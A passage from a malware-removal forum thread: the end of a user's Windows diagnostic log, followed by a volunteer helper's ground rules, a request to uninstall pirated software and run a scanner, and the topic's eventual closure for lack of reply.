{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:50 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.


CodeIntegrity:
===================================
Date: 2016-04-07 22:13:16.866
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:13:16.112
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:08.472
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:07.689
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:06.920
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:06.155
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-09-12 14:23:40.537
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\csrss.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\user32.dll that did not meet the Windows signing level requirements.

Date: 2015-09-12 14:23:40.131
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\smss.exe) attempted to load \Device\HarddiskVolume4\Windows\SysWOW64\user32.dll that did not meet the Windows signing level requirements.

Date: 2015-09-12 14:23:38.209
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\smss.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\user32.dll that did not meet the Windows signing level requirements.

Date: 2015-09-12 13:43:52.334
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\csrss.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\user32.dll that did not meet the Windows signing level requirements.


==================== Memory info ===========================

Processor: Intel® Celeron® CPU N2820 @ 2.13GHz
Percentage of memory in use: 61%
Total physical RAM: 3978.84 MB
Available physical RAM: 1521.13 MB
Total Virtual: 7503.84 MB
Available Virtual: 4532.58 MB

==================== Drives ================================

Drive c: (TI80158600B) (Fixed) (Total:195.32 GB) (Free:132.59 GB) NTFS
Drive d: (Drive) (Fixed) (Total:260.13 GB) (Free:127.17 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 04441887)

Partition: GPT.

==================== End of Addition.txt ============================

Edited by Oh My!, 05 December 2016 - 08:42 PM.


#2 Oh My!

    Adware and Spyware and Malware.....

  • Malware Response Instructor
  • 37,044 posts
  • Gender:Male
  • Location:California

Posted 05 December 2016 - 11:35 AM

Greetings J2M-CJBE and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. Please allow me just a bit of time to review what you have posted.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Oh My!

    Adware and Spyware and Malware.....

  • Malware Response Instructor
  • 37,044 posts
  • Gender:Male
  • Location:California

Posted 05 December 2016 - 08:59 PM

Greetings.

Unfortunately there is evidence of illegal software on your computer. I am going to request you completely uninstall Microsoft Office Professional Plus 2013 and any other products for which you do not have a valid Product Key, including all "cracked" software. If you are willing to do that please rerun a FRST scan and copy/paste both reports in your reply. If you prefer to leave the program(s) on your computer let me know that and I will be closing the Topic.

If you decide to remove the program(s) please run this after removal.

===================================================

CKScanner

--------------------
  • Download CKScanner and save it to your Desktop
  • Double click CKScanner
  • Select Search For Files
  • Once completed select Save List to File
  • A ckfiles.txt document will be placed on your Desktop
  • Copy and paste the results of that report in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • CKScanner report
  • FRST report
  • Addition report

Gary
 

#4 Oh My!

    Adware and Spyware and Malware.....

  • Malware Response Instructor
  • 37,044 posts
  • Gender:Male
  • Location:California

Posted 09 December 2016 - 09:45 AM

Greetings,

===================================================

Do You Still Need Help?

It has been 3 days since my last post.
  • Do you still need help with this?
  • If you have not replied within 48 hours I will assume you have abandoned the Topic and it will be closed.

Gary
 

#5 Oh My!

    Adware and Spyware and Malware.....

  • Malware Response Instructor
  • 37,044 posts
  • Gender:Male
  • Location:California

Posted 11 December 2016 - 09:57 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
Gary
 